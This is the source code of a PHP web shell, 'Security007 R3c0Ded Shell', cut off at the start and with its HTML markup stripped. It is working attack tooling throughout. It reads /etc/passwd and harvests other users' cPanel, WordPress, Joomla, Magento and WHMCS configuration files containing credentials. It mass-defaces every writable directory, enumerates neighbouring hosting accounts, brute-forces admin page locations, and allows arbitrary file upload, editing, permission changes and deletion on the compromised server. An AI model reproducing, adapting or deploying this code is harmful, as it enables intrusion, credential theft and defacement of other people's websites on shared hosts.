$value){ $_POST[$key] = stripslashes($value); } } echo ' Security007 R3c0Ded Shell

`Security007 Shell | [ Stay Close And Keep silent ] |`

'; echo "[] Admin Finder [] |[] CSRF Online [] | [] Config [] | [] Mass Deface [] |
[] Jumping [] | [] Home []"; if($_GET['do'] == 'csrf') { echo' CSRF EXPLOITER ONLINE

Csrf By Security007 URL:
POST File:
'; } if($_GET['do'] == 'config') { $etc = fopen("/etc/passwd", "r") or die("

Can't read /etc/passwd

"); $idx = mkdir("007_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("007_config/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_idx) { $user_config_dir = "/home/$user_idx/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_idx/.my.cnf" => "cpanel", "/home/$user_idx/.accesshash" => "WHM-accesshash", "/home/$user_idx/public_html/po-content/config.php" => "Popoji", "/home/$user_idx/public_html/vdo_config.php" => "Voodoo", "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_idx/public_html/forum/config.php" => "phpBB", "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal", "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_idx/public_html/app/etc/local.xml" => "Magento", "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla", "/home/$user_idx/public_html/configuration.php" => "Joomla", "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wp-config.php" => "WordPress", "/home/$user_idx/public_html/admin/config.php" => "OpenCart", "/home/$user_idx/public_html/slconfig.php" => "Sitelok", "/home/$user_idx/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("007_config/$user_idx-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo "Done"; } if($_GET['do'] == 'mass_deface') { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "

"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "

"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "

"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "

"; } } else { echo ""; echo " Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

"; } } if($_GET['do'] == 'jumping') { $i = 0; echo "

"; if(preg_match("/hsphere/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "

";
            foreach($urls as $url) {
                $url = str_replace(array("http://","www."), "", strtolower($url));
                $etc = "/etc/passwd";
                $f = fopen($etc,"r");
                while($gets = fgets($f)) {
                    $pecah = explode(":", $gets);
                    $user = $pecah[0];
                    $dir_user = "/hsphere/local/home/$user";
                    if(is_dir($dir_user) === true) {
                        $url_user = $dir_user."/".$url;
                        if(is_readable($url_user)) {
                            $i++;
                            $jrw = "[R] $url_user";
                            if(is_writable($url_user)) {
                                $jrw = "[RW] $url_user";
                            }
                            echo $jrw."
";
                        }
                    }
                }
            }
        if($i == 0) {
        } else {
            echo "
Total ada ".$i." Kamar di ".$ip;
        }
        echo "

"; } else { echo ' List Domains:

'; } } elseif(preg_match("/vhosts/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "

";
            foreach($urls as $url) {
                $web_vh = "/var/www/vhosts/$url/httpdocs";
                if(is_dir($web_vh) === true) {
                    if(is_readable($web_vh)) {
                        $i++;
                        $jrw = "[R] $web_vh";
                        if(is_writable($web_vh)) {
                            $jrw = "[RW] $web_vh";
                        }
                        echo $jrw."
";
                    }
                }
            }
        if($i == 0) {
        } else {
            echo "
Total ada ".$i." Kamar di ".$ip;
        }
        echo "

"; } else { echo ' List Domains:

'; } } else { echo "

";
        $etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
        while($passwd = fgets($etc)) {
            if($passwd == '' || !$etc) {
                echo "Can't read /etc/passwd";
            } else {
                preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
                foreach($user_jumping[1] as $user_idx_jump) {
                    $user_jumping_dir = "/home/$user_idx_jump/public_html";
                    if(is_readable($user_jumping_dir)) {
                        $i++;
                        $jrw = "[R] $user_jumping_dir";
                        if(is_writable($user_jumping_dir)) {
                            $jrw = "[RW] $user_jumping_dir";
                        }
                        echo $jrw;
                        if(function_exists('posix_getpwuid')) {
                            $domain_jump = file_get_contents("/etc/named.conf");   
                            if($domain_jump == '') {
                                echo " => ( gabisa ambil nama domain nya )
";
                            } else {
                                preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
                                foreach($domains_jump[1] as $dj) {
                                    $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
                                    $user_jumping_url = $user_jumping_url['name'];
                                    if($user_jumping_url == $user_idx_jump) {
                                        echo " => ( $dj )
";
                                        break;
                                    }
                                }
                            }
                        } else {
                            echo "
";
                        }
                    }
                }
            }
        }
        if($i == 0) {
        } else {
            echo "
Total ada ".$i." Kamar di ".$ip;
        }
        echo "

"; } echo "

"; }if($_GET['do'] == 'finder') { echo ' Admin Finder By L0c4lH05T ft Security007 FIND YOUR ADMIN PAGE!! ********************************************************************************************************************** This Tool Was Coded By Security007 And Recoded By L0c4lH05T Special Thanks To My Team And My Best Partner (xRoot a.k.a W1z4rd a.k.a Security007) Sebelum menggunakan Tool Ini Baca Bissmillah Dulu Dan Pastikan Anda Memiliki Wajah Tamvan Dan Sadar diri :P :-D (2010) ********************************************************************************************************************** Masukkan Target (Tanpa tanda "/" diakhir url target) : '; function xss_protect($data, $strip_tags = false, $allowed_tags =""){ if($strip_tags){ $data = strip_tags($dara, $allowed_tags. ""); } if(stripos($data, "script") !== false){ $result = str_replace("script","script",htmlentities($data, ENT_QUOTES)); }else{ $result = htmlentities($data, ENT_QUOTES); } return $result; } function urlExist($url){ $handle = curl_init($url); if(false === $handle) { return false; } curl_setopt($handle, CURLOPT_HEADER, false); curl_setopt($handle, CURLOPT_FAILONERROR, true); curl_setopt($handle, CURLOPT_HEADER, array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15")); curl_setopt($handle, CURLOPT_NOBODY, true); curl_setopt($handle, CURLOPT_RETURNTRANSFER, false); $connectable = curl_exec($handle); curl_close($handle); return $connectable; } if(isset($_POST['url'])) { $url = htmlentities(xss_protect($_POST['url'])); if(filter_var($url, FILTER_VALIDATE_URL)) { $trying = array("admin","administrator","adm","login","login.php","administrator.php","admins.php","logins","admincp", "admincp.php","admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php","admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/","administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php","administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html","moderator/admin.php","moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php","adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp","administrator/login.asp","administrator/account.asp","administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp","moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html","administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php","ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php","webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/","admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/","panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/","utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/","login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/","hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/","banneradmin/","sshadmin/","phpldapadmin/","macadmin/","administratoraccounts/", "admin4_account/","admin4_colon/","radmind-1/","SuperAdmin/","AdminTools/","cmsadmin/","SysAdmin2/","globes_admin/","cadmins/","phpSQLiteAdmin/", "navSiteAdmin/","server_admin_small/","logo_sysadmin/","server/","database_administration/","power_user/", "system_administration/", "ss_vms_admin_sm/"); foreach($trying as $sec) { $urll = $url.'/'.$sec; if(urlExist($urll)) { echo 'PAGE FOUND!!!'; exit; }else { echo ''.$urll.' does not exist.'; } } echo 'Could not find admin page.'; } else { echo 'Invalid URL entered.'; } } echo ' '; } if(isset($_GET['filesrc'])){ echo "

Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '

'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'Horee Upload Berhasil
'; }else{ echo 'Bangsat Upload Gagal
'; } } echo '

Current File : "; echo $_GET['filesrc']; echo '

'; echo(''.htmlspecialchars(file_get_contents($_GET['filesrc'])).''); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo ' '.$_POST['path'].' '; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Horee Ubah Permission Berhasil '; }else{ echo 'Bangsat Ubah Permission Gagal '; } } echo ' Permission : '; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Horee Ganti Nama Berhasil '; }else{ echo 'Bangsat Ganti Nama Gagal '; } $_POST['name'] = $_POST['newname']; } echo ' New Name : '; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Horee Berhasil Edit File '; }else{ echo 'Bangsat Gagal Edit File '; } fclose($fp); } echo ' '.htmlspecialchars(file_get_contents($_POST['path'])).' '; } echo ''; }else{ echo ' '; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Horee Directory Terhapus '; }else{ echo 'Bangsat Directory Gagal Terhapus '; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Horee File Terhapus '; }else{ echo 'Bangsat File Gagal Dihapus '; } } } echo ''; $scandir = scandir($path); echo ''; foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ''; } echo ''; foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ''; } echo ' Name Size Permission Modify '.$dir.' -- '; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo ''; echo ' '.$file.' '.$size.' '; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo ''; echo ' '; } echo ' Security007 R3c0Ded Shell '; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>

Name	Size	Permission	Modify
'.$dir.'	--	'; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) \|\| !is_readable($path.'/'.$dir)) echo ''; echo '

'.$file.'	'.$size.'	'; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) \|\| !is_readable($path.'/'.$file)) echo ''; echo '

Security007 Shell| [ Stay Close And Keep silent ] |

FIND YOUR ADMIN PAGE!!

`Security007 Shell | [ Stay Close And Keep silent ] |`